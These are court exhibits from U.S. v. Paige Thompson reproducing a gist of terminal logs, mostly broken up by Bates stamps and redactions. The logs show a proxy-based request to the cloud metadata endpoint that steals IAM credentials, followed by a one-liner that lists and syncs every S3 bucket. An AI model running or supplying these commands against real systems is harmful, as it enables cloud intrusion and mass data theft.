paigeadelethompson / **gist:9edf57dc3b10f72db5c8dc8e6ce16b9b**    Secret

Created 3 months ago • Report abuse

Embed ▾    `<script src="https://gi`    🔢    ⬆    Download ZIP

▣ gistfile1.txt

```
  1  ┌─ □  21.04.19 □ □  15:27:05 □  erratic@molly □ □  0.98 □ □ 69.60G □
  2  ├─ □ ~ □
  3  └─ eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.162.65.136:443 http://169.254.169.
  4  *   Trying 35.162.65.136...
  5  * TCP_NODELAY set
  6  * Connected to 35.162.65.136 (35.162.65.136) port 443 (#0)
  7  } [5 bytes data]
  8  * TLSv1.2 (OUT), TLS handshake, Client hello (1):
  9  } [167 bytes data]
 10  * TLSv1.2 (IN), TLS handshake, Server hello (2):
 11  { [57 bytes data]
 12  * TLSv1.2 (IN), TLS handshake, Certificate (11):
 13  { [4331 bytes data]
 14  * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
 15  { [333 bytes data]
 16  * TLSv1.2 (IN), TLS handshake, Server finished (14):
 17  { [4 bytes data]
 18  * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
 19  } [70 bytes data]
 20  * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
 21  } [1 bytes data]
 22  * TLSv1.2 (OUT), TLS handshake, Finished (20):
 23  } [16 bytes data]
 24  * TLSv1.2 (IN), TLS handshake, Finished (20):
 25  { [16 bytes data]
 26  * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
 27  * Server certificate:
 28  *  subject: businessCategory=Private Organization; jurisdictionC=US; jurisdictionST=Delaware; serialNumber=2419959; C=US; ST=Vi
 29  *  start date: Feb 21 00:00:00 2018 GMT
 30  *  expire date: Feb 21 12:00:00 2020 GMT
 31  *  issuer: C=US; O=DigiCert Inc; OU=www.digicert.com; CN=DigiCert SHA2 Extended Validation Server CA
 32  *  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
 33  } [5 bytes data]
 34  > GET http://169.254.169.254/latest/meta-data/iam/security-credentials/████████
 35  > Host: 169.254.169.254
 36  > User-Agent: curl/7.60.0
 37  > Accept: */*
 38  > Proxy-Connection: Keep-Alive
 39  >
 40  { [5 bytes data]
 41  < HTTP/1.1 200 OK
 42  < Date: Sun, 21 Apr 2019 22:28:01 GMT
 43  < Content-Type: text/plain; charset=UTF-8
 44  < Accept-Ranges: bytes
 45  < ETag: "2031680182"
 46  < Last-Modified: Sun, 21 Apr 2019 22:14:58 GMT
 47  < Content-Length: 1298
 48  <
 49  { [5 bytes data]
 50  * Connection #0 to host 35.162.65.136 left intact
 51  ┌─ □  21.04.19 □ □  15:28:02 □ erratic@molly □ □  0.99 □ □ 69.61G □
 52  ├─ □ ~ □
 53  └─ aws s3api list-buckets
 54  {
 55      "Buckets": [
 56          {
 57              ████████████████████████
```

CONFIDENTIAL - COUNSEL
ONLY - SECURITY
SENSITIVE INFORMATION

CONE_USAORR00000570

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 204
Admitted_____



CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000571



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 3 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 3/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000572

204-003



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 4/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000573

204-004



[redacted]

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION
CONE_USAORR00000574



[redacted]

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION
CONE_USAORR00000575



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 7/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000576

204-007



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 8 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 8/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000577

204-008



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 9 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 9/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000578

204-009



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 10 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 10/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000579

204-010



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 11/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000580

204-011



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 12 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 12/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000581

204-012



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 13 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 13/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000582

204-013



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 14/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000583

204-014



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 15/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000584

204-015



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 16 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 16/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000585

204-016



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 17 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 17/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000586

204-017



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 18 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 18/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000587

204-018



st",

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 20 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 20/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000589

204-020



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 21/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000590

204-021



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 22 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 22/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000591

204-022



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 23/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000592

204-023



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 24 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 24/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000593

204-024



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 25/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000594

204-025



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

[redacted]

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 26/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000595

204-026



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 27 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 27/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000596

204-027



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 28 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 28/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000597

204-028



CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000598



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 30 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 30/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000599

204-030



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 31 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 31/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000600

204-031



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 32 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 32/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000601

204-032



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 33 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 33/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000602

204-033



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 34 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 34/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000603

204-034



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 35 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 35/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000604

204-035



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 36 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 36/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000605

204-036



CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000606



CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000607



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

[redacted]

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 39/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000608

204-039



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 40 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 40/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000609

204-040



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 41 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 41/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000610

204-041



CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000611



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 43 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 43/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000612

204-043



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 44 of 150

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 44/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000613

204-044



7/27/2019 Case 2:19-cr-00159-RSL Document 373-12 Filed 09/27/22 Page 45 of 150
gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 45/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000614

204-045



7/27/2019 gist:9edf57dc3b10f72db5c8dc8e6ce16b9b

[redacted]

https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b 46/47

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

CONE_USAORR00000615

204-046

```
    }
}
┌─ □  21.04.19 □ □  15:28:07 □ erratic@molly □ □  0.97 □ □ 69.61G □
├─ □ ~ □
└─
```

paigeadelethom... commented on Apr 21 • edited

Author Owner

```
aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"                {}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync {} .
```

CONFIDENTIAL - COUNSEL ONLY - SECURITY SENSITIVE INFORMATION

```
╭─ ? 21.04.19 ⑯ ˜ 15:27:05 ⑮ erratic@molly ⑮ ⬍ 0.98 ⑮ ⦿ 69.60G
⑮
├─ ˜ ~ ⑮
⑰ 10131 ⑰ |
╰─ eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout
2 --proxy https://35.162.65.136:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/[redacted]| awssession.sh`
*   Trying 35.162.65.136...
* TCP_NODELAY set
* Connected to 35.162.65.136 (35.162.65.136) port 443 (#0)
} [5 bytes data]
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
} [167 bytes data]
* TLSv1.2 (IN), TLS handshake, Server hello (2):
{ [57 bytes data]
* TLSv1.2 (IN), TLS handshake, Certificate (11):
{ [4331 bytes data]
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
{ [333 bytes data]
* TLSv1.2 (IN), TLS handshake, Server finished (14):
{ [4 bytes data]
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
} [70 bytes data]
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
} [1 bytes data]
* TLSv1.2 (OUT), TLS handshake, Finished (20):
} [16 bytes data]
* TLSv1.2 (IN), TLS handshake, Finished (20):
{ [16 bytes data]
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* Proxy certificate:
*  subject: businessCategory=Private Organization; jurisdictionC=US;
jurisdictionST=Delaware; serialNumber=2419959; C=US; ST=Virginia;
L=McLean; O=Capital One Financial Corporation; OU=USCARDS;
CN=pong.kdc.capitalone.com
*  start date: Feb 21 00:00:00 2018 GMT
*  expire date: Feb 21 12:00:00 2020 GMT
*  issuer: C=US; O=DigiCert Inc; OU=www.digicert.com; CN=DigiCert SHA2
Extended Validation Server CA
*  SSL certificate verify result: unable to get local issuer
certificate (20), continuing anyway.
} [5 bytes data]
> GET http://169.254.169.254/latest/meta-data/iam/security-
credentials/[redacted]
> Host: 169.254.169.254
> User-Agent: curl/7.60.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
{ [5 bytes data]
< HTTP/1.1 200 OK
< Date: Sun, 21 Apr 2019 22:28:01 GMT
< Content-Type: text/plain; charset=UTF-8
< Accept-Ranges: bytes
< ETag: "2031680182"
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 205
Admitted___________________

```
< Last-Modified: Sun, 21 Apr 2019 22:14:58 GMT
< Content-Length: 1298
<
{ [5 bytes data]
* Connection #0 to host 35.162.65.136 left intact
╭─ ?  21.04.19 ⑯ ˜  15:28:02 ⑮ erratic@molly ⑮ ⧳  0.99 ⑮ ⏺ 69.61G
⑮
├─ ˜ ~ ⑮
⑰ 10132 ⑰ |
╰─ aws s3api list-buckets
{
    "Buckets": [
```

PROTECTED

USA-00004151
205-003



PROTECTED

USA-00004152
205-004

PROTECTED

USA-00004153
205-005





PROTECTED

USA-00004155
205-007



PROTECTED

USA-00004156
205-008



PROTECTED

USA-00004157
205-009



PROTECTED

USA-00004158
205-010



PROTECTED

USA-00004159
205-011



PROTECTED

USA-00004160
205-012



PROTECTED

USA-00004161
205-013





PROTECTED

USA-00004163
205-015



PROTECTED

USA-00004164
205-016



PROTECTED

USA-00004165
205-017



PROTECTED

USA-00004166
205-018

PROTECTED

USA-00004167
205-019



PROTECTED

USA-00004168
205-020



PROTECTED

USA-00004169
205-021



PROTECTED

USA-00004170
205-022



PROTECTED

USA-00004171
205-023



PROTECTED

USA-00004172
205-024





PROTECTED

USA-00004174
205-026

PROTECTED

USA-00004175
205-027



PROTECTED

USA-00004176
205-028



PROTECTED

USA-00004177
205-029



PROTECTED

USA-00004178
205-030



PROTECTED

USA-00004179
205-031

PROTECTED

USA-00004180
205-032



PROTECTED

USA-00004181
205-033



PROTECTED

USA-00004182
205-034



PROTECTED

USA-00004183
205-035



PROTECTED

USA-00004184
205-036

PROTECTED

USA-00004185
205-037

PROTECTED
Case 2:19-cr-00159-RSL   Document 373-12   Filed 09/27/22   Page 85 of 150

USA-00004186
205-038

PROTECTED

USA-00004187
205-039



PROTECTED

USA-00004188
205-040

PROTECTED

USA-00004189
205-041



PROTECTED

USA-00004191
205-043



PROTECTED

USA-00004192
205-044

PROTECTED

USA-00004193
205-045



PROTECTED

USA-00004194
205-046

PROTECTED

USA-00004195
205-047



PROTECTED

USA-00004196
205-048



PROTECTED

USA-00004197
205-049



PROTECTED

USA-00004198
205-050



PROTECTED

USA-00004199
205-051

PROTECTED

USA-00004201
205-053



PROTECTED

USA-00004202
205-054

```
    ],
    "Owner": {
        "ID":
"                                                              2220"
    }
}
```

```
╭─ ? 21.04.19 ⓽⓺ ~ 15:28:07 ⓽⓹ erratic@molly ⓽⓹ ⬆ 0.97 ⓽⓹ 69.61G
⓽⓹
├─ ~ ~ ⓽⓹
⓽⓻ 10133 ⓽⓻ |
╰─
```

```
╭─ □  21.04.19 □ □  15:27:06 □ erratic@molly □ □  0.98 □ □ 69.62G □
├─ □ ~
□
                         □ 10131 □ □
╰─ eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.162.65.136:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/[redacted] | awssession.sh`
*   Trying 35.162.65.136...
* TCP_NODELAY set
* Connected to 35.162.65.136 (35.162.65.136) port 443 (#0)
} [5 bytes data]
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
} [167 bytes data]
* TLSv1.2 (IN), TLS handshake, Server hello (2):
{ [57 bytes data]
* TLSv1.2 (IN), TLS handshake, Certificate (11):
{ [4331 bytes data]
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
{ [333 bytes data]
* TLSv1.2 (IN), TLS handshake, Server finished (14):
{ [4 bytes data]
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
} [70 bytes data]
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
} [1 bytes data]
* TLSv1.2 (OUT), TLS handshake, Finished (20):
} [16 bytes data]
* TLSv1.2 (IN), TLS handshake, Finished (20):
{ [16 bytes data]
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* Proxy certificate:
*  subject: businessCategory=Private Organization; jurisdictionC=US; jurisdictionST=Delaware;
serialNumber=2419959; C=US; ST=Virginia; L=McLean; O=Capital One Financial Corporation;
OU=USCARDS; CN=pong.kdc.capitalone.com
*  start date: Feb 21 00:00:00 2018 GMT
*  expire date: Feb 21 12:00:00 2020 GMT
*  issuer: C=US; O=DigiCert Inc; OU=www.digicert.com; CN=DigiCert SHA2 Extended Validation
Server CA
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
} [5 bytes data]
> GET http://169.254.169.254/latest/meta-data/iam/security-credentials/[redacted] HTTP/1.1
> Host: 169.254.169.254
> User-Agent: curl/7.60.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
{ [5 bytes data]
< HTTP/1.1 200 OK
< Date: Sun, 21 Apr 2019 22:28:01 GMT
< Content-Type: text/plain; charset=UTF-8
< Accept-Ranges: bytes
< ETag: "2031680182"
< Last-Modified: Sun, 21 Apr 2019 22:14:58 GMT
< Content-Length: 1298
<
{ [5 bytes data]
* Connection #0 to host 35.162.65.136 left intact
╭─ □  21.04.19 □ □  15:28:02 □ erratic@molly □ □  0.99 □ □ 69.61G □
├─ □ ~
□
                         □ 10132 □ □
╰─ aws s3api list-buckets
{
    "Buckets": [
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 252
Admitted____________________









252-005







252-008





252-010





252-012







252-016













252-023



252-025



252-026









252-030





252-032



252-033







252-038







252-041





252-043



252-044



252-046



 ```
        }
    ],
    "Owner": {
        "ID": "2220"
    }
}
```

```
╭─ □  21.04.19 □ □  15:28:07 □ erratic@molly □ □  0.97 □ □ 69.61G □
├─ □ ~
□
                        □ 10133 □ □
╰─
```